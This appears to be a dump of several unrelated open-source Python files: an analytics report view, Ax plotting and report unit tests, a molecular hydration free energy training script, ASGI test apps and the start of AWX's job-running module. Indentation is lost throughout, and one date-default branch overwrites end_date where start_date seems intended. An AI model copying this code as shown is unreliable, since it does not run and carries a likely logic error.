def _get_job_report(job_id, start_date, end_date):
return _get_object_report(Job, int(job_id), start_date, end_date)
def _get_task_report(task_id, start_date, end_date):
return _get_object_report(Task, int(task_id), start_date, end_date)
def _get_project_report(project_id, start_date, end_date):
return _get_object_report(Project, int(project_id), start_date, end_date)
def get_analytics_report(request, query_params):
query_params = {
"project_id": query_params.get("project_id", None),
"task_id": query_params.get("task_id", None),
"job_id": query_params.get("job_id", None),
"start_date": query_params.get("start_date", None),
"end_date": query_params.get("end_date", None),
}
try:
if query_params["start_date"]:
query_params["start_date"] = parser.parse(query_params["start_date"])
except parser.ParserError:
raise serializers.ValidationError(
f"Cannot parse 'start_date' datetime parameter: {query_params['start_date']}"
)
try:
if query_params["end_date"]:
query_params["end_date"] = parser.parse(query_params["end_date"])
except parser.ParserError:
raise serializers.ValidationError(
f"Cannot parse 'end_date' datetime parameter: {query_params['end_date']}"
)
if (
query_params["start_date"]
and query_params["end_date"]
and query_params["start_date"] > query_params["end_date"]
):
raise serializers.ValidationError("'start_date' must be before than 'end_date'")
# Set the default time interval to last 30 days
if not query_params["start_date"] and not query_params["end_date"]:
query_params["end_date"] = datetime.now(timezone.utc)
query_params["start_date"] = query_params["end_date"] - timedelta(days=30)
elif query_params["start_date"] and not query_params["end_date"]:
query_params["end_date"] = datetime.now(timezone.utc)
elif not query_params["start_date"] and query_params["end_date"]:
query_params["end_date"] = datetime.min
job_id = query_params.get("job_id", None)
task_id = query_params.get("task_id", None)
project_id = query_params.get("project_id", None)
if job_id is None and task_id is None and project_id is None:
raise serializers.ValidationError("No any job, task or project specified")
if sum(map(bool, [job_id, task_id, project_id])) > 1:
raise serializers.ValidationError(
"Only one of job_id, task_id or project_id must be specified"
)
report = None
try:
if job_id is not None:
report = _get_job_report(job_id, query_params["start_date"], query_params["end_date"])
elif task_id is not None:
report = _get_task_report(task_id, query_params["start_date"], query_params["end_date"])
elif project_id is not None:
report = _get_project_report(
project_id, query_params["start_date"], query_params["end_date"]
)
except AnalyticsReport.DoesNotExist:
return Response("Analytics report not found", status=status.HTTP_404_NOT_FOUND)
serializer = AnalyticsReportSerializer(data=report)
serializer.is_valid(raise_exception=True)
return Response(serializer.data)
| repo: facebook/Ax | path: /ax/service/tests/test_report_utils.py | license: MIT (permissive) | Python | UTF-8 | 20,763 bytes |
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
from collections import namedtuple
from logging import INFO, WARN
from typing import Dict, List
from unittest import mock
from unittest.mock import patch
import pandas as pd
from ax.core.arm import Arm
from ax.core.metric import Metric
from ax.core.objective import MultiObjective, Objective
from ax.core.optimization_config import MultiObjectiveOptimizationConfig
from ax.core.outcome_constraint import ObjectiveThreshold
from ax.core.types import ComparisonOp
from ax.modelbridge.registry import Models
from ax.service.utils.report_utils import (
_get_cross_validation_plots,
_get_curve_plot_dropdown,
_get_metric_name_pairs,
_get_objective_trace_plot,
_get_objective_v_param_plots,
_get_shortest_unique_suffix_dict,
_objective_vs_true_objective_scatter,
compute_maximum_map_values,
exp_to_df,
Experiment,
FEASIBLE_COL_NAME,
get_standard_plots,
plot_feature_importance_by_feature_plotly,
)
from ax.utils.common.testutils import TestCase
from ax.utils.common.typeutils import checked_cast
from ax.utils.testing.core_stubs import (
get_branin_experiment,
get_branin_experiment_with_multi_objective,
get_branin_experiment_with_timestamp_map_metric,
get_experiment_with_observations,
get_high_dimensional_branin_experiment,
get_multi_type_experiment,
get_test_map_data_experiment,
)
from ax.utils.testing.mock import fast_botorch_optimize
from ax.utils.testing.modeling_stubs import get_generation_strategy
from plotly import graph_objects as go
OBJECTIVE_NAME = "branin"
PARAMETER_COLUMNS = ["x1", "x2"]
FLOAT_COLUMNS: List[str] = [OBJECTIVE_NAME] + PARAMETER_COLUMNS
EXPECTED_COLUMNS: List[str] = [
"trial_index",
"arm_name",
"trial_status",
"generation_method",
] + FLOAT_COLUMNS
DUMMY_OBJECTIVE_MEAN = 1.2345
DUMMY_SOURCE = "test_source"
DUMMY_MAP_KEY = "test_map_key"
TRUE_OBJECTIVE_NAME = "other_metric"
TRUE_OBJECTIVE_MEAN = 2.3456
DUMMY_MSG = "test_message"
class ReportUtilsTest(TestCase):
@patch(
"ax.service.utils.report_utils._merge_results_if_no_duplicates",
autospec=True,
return_value=pd.DataFrame(
[
# Trial indexes are out-of-order.
{"arm_name": "a", "trial_index": 1},
{"arm_name": "b", "trial_index": 2},
{"arm_name": "c", "trial_index": 0},
]
),
)
def test_exp_to_df_row_ordering(self, _) -> None:
"""
This test verifies that the returned data frame indexes are
in the same order as trial index. It mocks _merge_results_if_no_duplicates
to verify just the ordering of items in the final data frame.
"""
exp = get_branin_experiment(with_trial=True)
df = exp_to_df(exp)
# Check that all 3 rows are in order
self.assertEqual(len(df), 3)
for idx, row in df.iterrows():
self.assertEqual(row["trial_index"], idx)
@patch(
"ax.service.utils.report_utils._merge_results_if_no_duplicates",
autospec=True,
return_value=pd.DataFrame(
[
# Trial indexes are out-of-order.
{
"col1": 1,
"arm_name": "a",
"trial_status": "FAILED",
"generation_method": "Manual",
"trial_index": 1,
},
{
"col1": 2,
"arm_name": "b",
"trial_status": "COMPLETED",
"generation_method": "BO",
"trial_index": 2,
},
{
"col1": 3,
"arm_name": "c",
"trial_status": "COMPLETED",
"generation_method": "Manual",
"trial_index": 0,
},
]
),
)
def test_exp_to_df_col_ordering(self, _) -> None:
"""
        This test verifies that the fixed metadata columns of the returned data
        frame come first and in the expected order. It mocks
        _merge_results_if_no_duplicates to verify just the ordering of columns
        in the final data frame.
"""
exp = get_branin_experiment(with_trial=True)
df = exp_to_df(exp)
self.assertListEqual(
list(df.columns),
["trial_index", "arm_name", "trial_status", "generation_method", "col1"],
)
def test_exp_to_df_max_map_value(self) -> None:
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=0)
def compute_maximum_map_values_timestamp(
experiment: Experiment,
) -> Dict[int, float]:
return compute_maximum_map_values(
experiment=experiment, map_key="timestamp"
)
df = exp_to_df(
exp=exp,
additional_fields_callables={ # pyre-ignore
"timestamp": compute_maximum_map_values_timestamp
},
)
self.assertEqual(df["timestamp"].tolist(), [5.0, 5.0, 5.0])
def test_exp_to_df_trial_timing(self) -> None:
# 1. test all have started, none have completed
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=0)
df = exp_to_df(
exp=exp,
trial_attribute_fields=["time_run_started", "time_completed"],
always_include_field_columns=True,
)
self.assertTrue("time_run_started" in list(df.columns))
self.assertTrue("time_completed" in list(df.columns))
# since all trials started, all should have values
self.assertFalse(any(df["time_run_started"].isnull()))
# since no trials are complete, all should be None
self.assertTrue(all(df["time_completed"].isnull()))
# 2. test some trials not started yet
exp.trials[0]._time_run_started = None
df = exp_to_df(
exp=exp, trial_attribute_fields=["time_run_started", "time_completed"]
)
# the first trial should have NaN for rel_time_run_started
self.assertTrue(df["time_run_started"].isnull().iloc[0])
# 3. test all trials not started yet
for t in exp.trials.values():
t._time_run_started = None
df = exp_to_df(
exp=exp,
trial_attribute_fields=["time_run_started", "time_completed"],
always_include_field_columns=True,
)
self.assertTrue(all(df["time_run_started"].isnull()))
# 4. test some trials are completed
exp = get_test_map_data_experiment(num_trials=3, num_fetches=5, num_complete=2)
df = exp_to_df(
exp=exp, trial_attribute_fields=["time_run_started", "time_completed"]
)
# the last trial should have NaN for rel_time_completed
self.assertTrue(df["time_completed"].isnull().iloc[2])
def test_exp_to_df(self) -> None:
# MultiTypeExperiment should fail
exp = get_multi_type_experiment()
with self.assertRaisesRegex(ValueError, "MultiTypeExperiment"):
exp_to_df(exp=exp)
# exp with no trials should return empty results
exp = get_branin_experiment()
df = exp_to_df(exp=exp)
self.assertEqual(len(df), 0)
# set up experiment
exp = get_branin_experiment(with_batch=True)
# check that pre-run experiment returns all columns except objective
df = exp_to_df(exp)
self.assertEqual(set(EXPECTED_COLUMNS) - set(df.columns), {OBJECTIVE_NAME})
self.assertEqual(len(df.index), len(exp.arms_by_name))
exp.trials[0].run()
exp.fetch_data()
# assert result is df with expected columns and length
df = exp_to_df(exp=exp)
self.assertIsInstance(df, pd.DataFrame)
self.assertListEqual(sorted(df.columns), sorted(EXPECTED_COLUMNS))
self.assertEqual(len(df.index), len(exp.arms_by_name))
# test with run_metadata_fields and trial_properties_fields not empty
# add source to properties
for _, trial in exp.trials.items():
trial._properties["source"] = DUMMY_SOURCE
df = exp_to_df(
exp, run_metadata_fields=["name"], trial_properties_fields=["source"]
)
self.assertIn("name", df.columns)
self.assertIn("trial_properties_source", df.columns)
# test column values or types
self.assertTrue(all(x == 0 for x in df.trial_index))
self.assertTrue(all(x == "RUNNING" for x in df.trial_status))
self.assertTrue(all(x == "Sobol" for x in df.generation_method))
self.assertTrue(all(x == DUMMY_SOURCE for x in df.trial_properties_source))
self.assertTrue(all(x == "branin_test_experiment_0" for x in df.name))
for float_column in FLOAT_COLUMNS:
self.assertTrue(all(isinstance(x, float) for x in df[float_column]))
# works correctly for failed trials (will need to mock)
dummy_struct = namedtuple("dummy_struct", "df")
mock_results = dummy_struct(
df=pd.DataFrame(
{
"arm_name": ["0_0"],
"metric_name": [OBJECTIVE_NAME],
"mean": [DUMMY_OBJECTIVE_MEAN],
"sem": [0],
"trial_index": [0],
"n": [123],
"frac_nonnull": [1],
}
)
)
with patch.object(Experiment, "lookup_data", lambda self: mock_results):
df = exp_to_df(exp=exp)
# all but one row should have a metric value of NaN
self.assertEqual(pd.isna(df[OBJECTIVE_NAME]).sum(), len(df.index) - 1)
# an experiment with more results than arms raises an error
with patch.object(
Experiment, "lookup_data", lambda self: mock_results
), self.assertRaisesRegex(ValueError, "inconsistent experimental state"):
exp_to_df(exp=get_branin_experiment())
# custom added trial has a generation_method of Manual
custom_arm = Arm(name="custom", parameters={"x1": 0, "x2": 0})
exp.new_trial().add_arm(custom_arm)
df = exp_to_df(exp)
self.assertEqual(
df[df.arm_name == "custom"].iloc[0].generation_method, "Manual"
)
        # a failing feasibility calculation logs a warning and suppresses the error
observations = [[1.0, 2.0, 3.0], [4.0, 5.0, -6.0], [7.0, 8.0, 9.0]]
exp = get_experiment_with_observations(
observations=observations,
constrained=True,
)
with patch(
f"{exp_to_df.__module__}._is_row_feasible", side_effect=KeyError(DUMMY_MSG)
), self.assertLogs(logger="ax", level=WARN) as log:
exp_to_df(exp)
self.assertIn(
f"Feasibility calculation failed with error: '{DUMMY_MSG}'",
log.output[0],
)
# infeasible arm has `is_feasible = False`.
df = exp_to_df(exp)
self.assertListEqual(list(df[FEASIBLE_COL_NAME]), [True, False, True])
# all rows infeasible.
observations = [[1.0, 2.0, -3.0], [4.0, 5.0, -6.0], [7.0, 8.0, -9.0]]
exp = get_experiment_with_observations(
observations=observations,
constrained=True,
)
df = exp_to_df(exp)
self.assertListEqual(list(df[FEASIBLE_COL_NAME]), [False, False, False])
def test_get_shortest_unique_suffix_dict(self) -> None:
expected_output = {
"abc.123": "abc.123",
"asdf.abc.123": "asdf.abc.123",
"def.123": "def.123",
"abc.456": "456",
"": "",
"no_delimiter": "no_delimiter",
}
actual_output = _get_shortest_unique_suffix_dict(
["abc.123", "abc.456", "def.123", "asdf.abc.123", "", "no_delimiter"]
)
self.assertDictEqual(expected_output, actual_output)
@fast_botorch_optimize
def test_get_standard_plots(self) -> None:
exp = get_branin_experiment()
self.assertEqual(
len(
get_standard_plots(
experiment=exp, model=get_generation_strategy().model
)
),
0,
)
exp = get_branin_experiment(with_batch=True, minimize=True)
exp.trials[0].run()
model = Models.BOTORCH(experiment=exp, data=exp.fetch_data())
for gsa, true_objective_metric_name in itertools.product(
[False, True], ["branin", None]
):
with self.subTest(global_sensitivity_analysis=gsa):
plots = get_standard_plots(
experiment=exp,
model=model,
global_sensitivity_analysis=gsa,
true_objective_metric_name=true_objective_metric_name,
)
self.assertEqual(len(plots), 8 if true_objective_metric_name else 6)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
# Raise an exception in one plot and make sure we generate the others
for plot_function, num_expected_plots in [
[_get_curve_plot_dropdown, 8], # Not used
[_get_objective_trace_plot, 6],
[_objective_vs_true_objective_scatter, 7],
[_get_objective_v_param_plots, 6],
[_get_cross_validation_plots, 7],
[plot_feature_importance_by_feature_plotly, 6],
]:
with mock.patch(
# pyre-ignore
f"ax.service.utils.report_utils.{plot_function.__name__}",
side_effect=Exception(),
):
plots = get_standard_plots(
experiment=exp,
model=model,
global_sensitivity_analysis=True,
true_objective_metric_name="branin",
)
self.assertEqual(len(plots), num_expected_plots)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
@fast_botorch_optimize
def test_get_standard_plots_moo(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds = [
ObjectiveThreshold(
metric=exp.metrics["branin_a"], op=ComparisonOp.GEQ, bound=-100.0
),
ObjectiveThreshold(
metric=exp.metrics["branin_b"], op=ComparisonOp.LEQ, bound=100.0
),
]
exp.trials[0].run()
# NOTE: level set to INFO in this block, because the global sensitivity
# analysis raises an INFO level log entry here. Leaving level=WARN here
# actually passes on Python 3.8 because of a language internal bug. See
# https://bugs.python.org/issue41943 for more information.
with self.assertLogs(logger="ax", level=INFO) as log:
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(log.output), 2)
self.assertIn(
"Pareto plotting not supported for experiments with relative objective "
"thresholds.",
log.output[0],
)
self.assertIn(
"Failed to compute global feature sensitivities:",
log.output[1],
)
self.assertEqual(len(plots), 6)
@fast_botorch_optimize
def test_get_standard_plots_moo_relative_constraints(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds = [
ObjectiveThreshold(
metric=exp.metrics["branin_a"], op=ComparisonOp.GEQ, bound=-100.0
),
ObjectiveThreshold(
metric=exp.metrics["branin_b"], op=ComparisonOp.LEQ, bound=100.0
),
]
exp.trials[0].run()
for ot in checked_cast(
MultiObjectiveOptimizationConfig, exp.optimization_config
)._objective_thresholds:
ot.relative = False
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(plots), 8)
@fast_botorch_optimize
def test_get_standard_plots_moo_no_objective_thresholds(self) -> None:
exp = get_branin_experiment_with_multi_objective(with_batch=True)
exp.optimization_config.objective.objectives[0].minimize = False
exp.optimization_config.objective.objectives[1].minimize = True
exp.trials[0].run()
plots = get_standard_plots(
experiment=exp, model=Models.MOO(experiment=exp, data=exp.fetch_data())
)
self.assertEqual(len(plots), 8)
@fast_botorch_optimize
def test_get_standard_plots_map_data(self) -> None:
exp = get_branin_experiment_with_timestamp_map_metric(with_status_quo=True)
exp.new_trial().add_arm(exp.status_quo)
exp.trials[0].run()
exp.new_trial(
generator_run=Models.SOBOL(search_space=exp.search_space).gen(n=1)
)
exp.trials[1].run()
plots = get_standard_plots(
experiment=exp,
model=Models.BOTORCH(experiment=exp, data=exp.fetch_data()),
true_objective_metric_name="branin",
)
self.assertEqual(len(plots), 9)
self.assertTrue(all(isinstance(plot, go.Figure) for plot in plots))
self.assertIn(
"Objective branin_map vs. True Objective Metric branin",
[p.layout.title.text for p in plots],
)
with self.assertRaisesRegex(
ValueError, "Please add a valid true_objective_metric_name"
):
plots = get_standard_plots(
experiment=exp,
model=Models.BOTORCH(experiment=exp, data=exp.fetch_data()),
true_objective_metric_name="not_present",
)
@fast_botorch_optimize
def test_skip_contour_high_dimensional(self) -> None:
exp = get_high_dimensional_branin_experiment()
# Initial Sobol points
sobol = Models.SOBOL(search_space=exp.search_space)
for _ in range(1):
exp.new_trial(sobol.gen(1)).run()
model = Models.GPEI(
experiment=exp,
data=exp.fetch_data(),
)
with self.assertLogs(logger="ax", level=WARN) as log:
_get_objective_v_param_plots(experiment=exp, model=model)
self.assertEqual(len(log.output), 1)
self.assertIn("Skipping creation of 2450 contour plots", log.output[0])
_get_objective_v_param_plots(
experiment=exp, model=model, max_num_slice_plots=10
)
# Adds two more warnings.
self.assertEqual(len(log.output), 3)
self.assertIn("Skipping creation of 50 slice plots", log.output[1])
def test_get_metric_name_pairs(self) -> None:
exp = get_branin_experiment(with_trial=True)
exp._optimization_config = MultiObjectiveOptimizationConfig(
objective=MultiObjective(
objectives=[
Objective(metric=Metric("m0")),
Objective(metric=Metric("m1")),
Objective(metric=Metric("m2")),
Objective(metric=Metric("m3")),
Objective(metric=Metric("m4")),
]
)
)
with self.assertLogs(logger="ax", level=WARN) as log:
metric_name_pairs = _get_metric_name_pairs(experiment=exp)
self.assertEqual(len(log.output), 1)
self.assertIn(
"Creating pairwise Pareto plots for the first `use_n_metrics",
log.output[0],
)
self.assertListEqual(
list(metric_name_pairs),
list(itertools.combinations([f"m{i}" for i in range(4)], 2)),
)
|
2bdcb1d802f64bf07ab8132ffeb06c3d1bf60908 | 2898b860d0440fb10a83d8f28815ac75b0cec9a5 | /attic/training/hydration_fe.py | 580f38eefe4b65081d4c8b69477602012164eb55 | ["Apache-2.0"] | permissive | proteneer/timemachine | e3530e52aa995a9006d0eca8632ac6b937571980 | b853c2d287da0d1c1babb963eaec8fda41539b90 | refs/heads/master | 2023-08-18T09:00:55.463397 | 2023-08-17T22:07:22 | 2023-08-17T22:07:22 | 163,188,061 | 132 | 14 | NOASSERTION | 2023-09-13T21:39:20 | 2018-12-26T14:25:45 | Python | UTF-8 | Python | false | false | 8,240 | py | hydration_fe.py |
import matplotlib
matplotlib.use("Agg")
from matplotlib import pyplot as plt
from jax.config import config as jax_config
jax_config.update("jax_enable_x64", True)
import argparse
import time
import datetime
import numpy as np
import os
import sys
from timemachine.ff import handlers
from timemachine.ff.handlers.serialize import serialize_handlers
from timemachine.ff.handlers.deserialize import deserialize_handlers
from rdkit import Chem
import configparser
import grpc
from timemachine.training import dataset
from training import hydration_model, hydration_setup
from training import simulation
from training import service_pb2_grpc
from timemachine.lib import LangevinIntegrator
from timemachine.md import builders
# used during visualization to bring everything back to home box
def recenter(conf, box):
new_coords = []
periodicBoxSize = box
for atom in conf:
diff = np.array([0.0, 0.0, 0.0])
diff += periodicBoxSize[2] * np.floor(atom[2] / periodicBoxSize[2][2])
diff += periodicBoxSize[1] * np.floor((atom[1] - diff[1]) / periodicBoxSize[1][1])
diff += periodicBoxSize[0] * np.floor((atom[0] - diff[0]) / periodicBoxSize[0][0])
new_coords.append(atom - diff)
return np.array(new_coords)
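# Worked example (a minimal sketch, assuming a cubic 3 nm box, i.e. box = 3.0 * np.eye(3)):
# an atom at (3.5, -0.2, 1.0) is wrapped to (0.5, 2.8, 1.0). Subtracting the z, then y,
# then x box vectors in that order also handles triclinic boxes, where the z and y box
# vectors can carry x/y components.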
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Absolute Hydration Free Energy Script")
parser.add_argument("--config_file", type=str, required=True, help="Location of config file.")
args = parser.parse_args()
config = configparser.ConfigParser()
config.read(args.config_file)
print("Config Settings:")
config.write(sys.stdout)
general_cfg = config["general"]
# basic gist of workflow:
# 1. configure learning rates for the optimizer
# 2. load freesolv dataset from SDF file
# 3. split dataset into train/test
# 4. connect to workers
# 5. deserialize off smirnoff parameters
# 6. prepare water box
# 7. for each epoch, first run on test set then shuffled training set
# 8. save parameters after each molecule
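    # Illustrative config layout (a sketch only; section and key names come from the
    # reads below, all values are hypothetical):
    #
    #   [general]
    #   ligand_sdf = freesolv.sdf
    #   dG = dG
    #   dG_err = dG_err
    #   train_frac = 0.8
    #   forcefield = ff_params.py
    #   out_dir = results
    #   lambda_schedule = 0.0,0.25,0.5,0.75,1.0
    #   n_steps = 100000
    #
    #   [learning_rates]
    #   am1ccc = 0.001
    #   lj = 0.0001,0.0001
    #
    #   [integrator]
    #   temperature = 300.0
    #   dt = 1.5e-3
    #   friction = 1.0
    #
    #   [workers]
    #   hosts = localhost:50051,localhost:50052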
# set up learning rates
learning_rates = {}
for k, v in config["learning_rates"].items():
vals = [float(x) for x in v.split(",")]
if k == "am1ccc":
learning_rates[handlers.AM1CCCHandler] = np.array(vals)
elif k == "lj":
learning_rates[handlers.LennardJonesHandler] = np.array(vals)
intg_cfg = config["integrator"]
suppl = Chem.SDMolSupplier(general_cfg["ligand_sdf"], removeHs=False)
data = []
for guest_idx, mol in enumerate(suppl):
label_dG = -4.184 * float(mol.GetProp(general_cfg["dG"])) # in kcal/mol
label_err = 4.184 * float(mol.GetProp(general_cfg["dG_err"])) # errs are positive!
data.append((mol, label_dG, label_err))
full_dataset = dataset.Dataset(data)
train_frac = float(general_cfg["train_frac"])
train_dataset, test_dataset = full_dataset.split(train_frac)
forcefield = general_cfg["forcefield"]
stubs = []
worker_address_list = []
for address in config["workers"]["hosts"].split(","):
worker_address_list.append(address)
for address in worker_address_list:
print("connecting to", address)
channel = grpc.insecure_channel(
address,
options=[
("grpc.max_send_message_length", 500 * 1024 * 1024),
("grpc.max_receive_message_length", 500 * 1024 * 1024),
],
)
stub = service_pb2_grpc.WorkerStub(channel)
stubs.append(stub)
ff_raw = open(forcefield, "r").read()
ff_handlers = deserialize_handlers(ff_raw)
box_width = 3.0
host_system, host_coords, box, _ = builders.build_water_system(box_width)
lambda_schedule = np.array([float(x) for x in general_cfg["lambda_schedule"].split(",")])
num_steps = int(general_cfg["n_steps"])
for epoch in range(100):
print("Starting Epoch", epoch, datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S"))
epoch_dir = os.path.join(general_cfg["out_dir"], "epoch_" + str(epoch))
if not os.path.exists(epoch_dir):
os.makedirs(epoch_dir)
epoch_params = serialize_handlers(ff_handlers)
with open(os.path.join(epoch_dir, "start_epoch_params.py"), "w") as fh:
fh.write(epoch_params)
all_data = []
test_items = [(x, True) for x in test_dataset.data]
train_dataset.shuffle()
train_items = [(x, False) for x in train_dataset.data]
all_data.extend(test_items)
all_data.extend(train_items)
for idx, ((mol, label_dG, label_err), inference) in enumerate(all_data):
if inference:
prefix = "test"
else:
prefix = "train"
start_time = time.time()
            # out_dir = os.path.join(epoch_dir, "mol_"+mol.GetProp("_Name"))
# if not os.path.exists(out_dir):
# os.makedirs(out_dir)
# safety guard
try:
potentials, masses, vjp_fns = hydration_setup.combine_potentials(
ff_handlers, mol, host_system, precision=np.float32
)
coords = hydration_setup.combine_coordinates(host_coords, mol)
seed = np.random.randint(0, np.iinfo(np.int32).max)
intg = LangevinIntegrator(
float(intg_cfg["temperature"]), float(intg_cfg["dt"]), float(intg_cfg["friction"]), masses, seed
)
sim = simulation.Simulation(coords, np.zeros_like(coords), box, potentials, intg)
(pred_dG, pred_err), grad_dG, du_dls = hydration_model.simulate(sim, num_steps, lambda_schedule, stubs)
plt.plot(lambda_schedule, du_dls)
plt.ylabel("du_dlambda")
plt.xlabel("lambda")
plt.savefig(os.path.join(epoch_dir, "ti_mol_" + mol.GetProp("_Name")))
plt.clf()
loss = np.abs(pred_dG - label_dG)
# (ytz) bootstrap CI on TI is super janky
# error CIs are wrong "95% CI [{:.2f}, {:.2f}, {:.2f}]".format(pred_err.lower_bound, pred_err.value, pred_err.upper_bound),
print(
prefix,
"mol",
mol.GetProp("_Name"),
"loss {:.2f}".format(loss),
"pred_dG {:.2f}".format(pred_dG),
"label_dG {:.2f}".format(label_dG),
"label err {:.2f}".format(label_err),
"time {:.2f}".format(time.time() - start_time),
"smiles:",
Chem.MolToSmiles(mol),
)
# update ff parameters
if not inference:
loss_grad = np.sign(pred_dG - label_dG)
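                    # d|pred - label|/d pred = sign(pred - label); combined with the
                    # VJPs below this gives the L1-loss gradient with respect to the
                    # forcefield parameters.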
assert len(grad_dG) == len(vjp_fns)
for grad, handle_and_vjp_fns in zip(grad_dG, vjp_fns):
for handle, vjp_fn in handle_and_vjp_fns:
if type(handle) in learning_rates:
bounds = learning_rates[type(handle)]
dL_dp = loss_grad * vjp_fn(grad)[0]
dL_dp = np.clip(dL_dp, -bounds, bounds)
handle.params -= dL_dp
epoch_params = serialize_handlers(ff_handlers)
# write parameters after each training molecule
with open(
os.path.join(
epoch_dir, "checkpoint_params_idx_" + str(idx) + "_mol_" + mol.GetProp("_Name") + ".py"
),
"w",
) as fh:
fh.write(epoch_params)
except Exception as e:
import traceback
print("Exception in mol", mol.GetProp("_Name"), Chem.MolToSmiles(mol), e)
traceback.print_exc()
# epoch_params = serialize_handlers(ff_handlers)
# with open(os.path.join(epoch_dir, "end_epoch_params.py"), 'w') as fh:
# fh.write(epoch_params)
|
a13b63a9c01533bf7d75c0d77ada364a8670aa5c | 331640994b1b6f66c1639278571ddbdc6c8c0751 | /test/python/targets/asgi.py | 749ec5b108ede5fb1e1a7761dbd2023b4d6bf0e5 | ["Apache-2.0"] | permissive | nginx/unit | eabcd067eaa60f4bdcf0cfaffe7d9932add2c66a | 9b22b6957bc87b3df002d0bc691fdae6a20abdac | refs/heads/master | 2023-09-04T02:02:13.581700 | 2023-08-30T16:07:24 | 2023-08-30T16:07:24 | 102,627,638 | 4,649 | 452 | Apache-2.0 | 2023-09-12T01:28:22 | 2017-09-06T15:45:30 | C | UTF-8 | Python | false | false | 1,573 | py | asgi.py |
async def application_201(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 201,
'headers': [(b'content-length', b'0')],
}
)
async def application_200(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'0')],
}
)
async def application_prefix(scope, receive, send):
assert scope['type'] == 'http'
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [
(b'content-length', b'0'),
(b'prefix', scope.get('root_path', 'NULL').encode()),
],
}
)
await send({'type': 'http.response.body', 'body': b''})
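# The callables below use the legacy (ASGI 2.0) double-callable style: the outer
# function receives only the scope and returns a coroutine that is then called
# with (receive, send).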
def legacy_application_200(scope):
assert scope['type'] == 'http'
return legacy_app_http_200
async def legacy_app_http_200(receive, send):
await send(
{
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'0')],
}
)
def legacy_application_201(scope, receive=None, send=None):
assert scope['type'] == 'http'
return legacy_app_http_201
async def legacy_app_http_201(receive, send):
await send(
{
'type': 'http.response.start',
'status': 201,
'headers': [(b'content-length', b'0')],
}
)
|
a770b81dbd3dae503449996241ba9fd658b5fc07 | 8de1480d6511ac81c43ebb1fa50875adb1505c3b | /awx/main/tasks/jobs.py | 6e57dfd8e4031624ee2d4f0138d6f5c0cea31c26 | ["Apache-2.0"] | permissive | ansible/awx | bbbb0f3f43835a37fbb3eb3dcd7cfe98116fbbba | 5e105c2cbd3fe828160540b3043cf6f605ed26be | refs/heads/devel | 2023-08-31T11:45:01.446444 | 2023-08-31T04:58:57 | 2023-08-31T04:58:57 | 91,594,105 | 13,353 | 4,186 | NOASSERTION | 2023-09-14T20:20:07 | 2017-05-17T15:50:14 | Python | UTF-8 | Python | false | false | 88,555 | py | jobs.py |
# Python
from collections import OrderedDict
import errno
import functools
import fcntl
import json
import logging
import os
from pathlib import Path
import shutil
import stat
import yaml
import tempfile
import traceback
import time
import urllib.parse as urlparse
# Django
from django.conf import settings
# Runner
import ansible_runner
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# AWX
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_task_queuename
from awx.main.constants import (
PRIVILEGE_ESCALATION_METHODS,
STANDARD_INVENTORY_UPDATE_ENV,
JOB_FOLDER_PREFIX,
MAX_ISOLATED_PATH_COLON_DELIMITER,
CONTAINER_VOLUMES_MOUNT_TYPES,
ACTIVE_STATES,
HOST_FACTS_FIELDS,
)
from awx.main.models import (
Instance,
Inventory,
InventorySource,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.tasks.callback import (
RunnerCallback,
RunnerCallbackForAdHocCommand,
RunnerCallbackForInventoryUpdate,
RunnerCallbackForProjectUpdate,
RunnerCallbackForSystemJob,
)
from awx.main.tasks.signals import with_signal_handling, signal_callback
from awx.main.tasks.receptor import AWXReceptorJob
from awx.main.tasks.facts import start_fact_cache, finish_fact_cache
from awx.main.exceptions import AwxTaskError, PostRunError, ReceptorNodeNotFound
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.execution_environments import CONTAINER_ROOT, to_container_path
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.common import (
update_scm_url,
extract_ansible_vars,
get_awx_version,
create_partition,
)
from awx.conf.license import get_license
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.tasks.system import update_smart_memberships_for_inventory, update_inventory_computed_fields
from awx.main.utils.update_model import update_model
from rest_framework.exceptions import PermissionDenied
from django.utils.translation import gettext_lazy as _
logger = logging.getLogger('awx.main.tasks.jobs')
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
callback_class = RunnerCallback
def __init__(self):
self.cleanup_paths = []
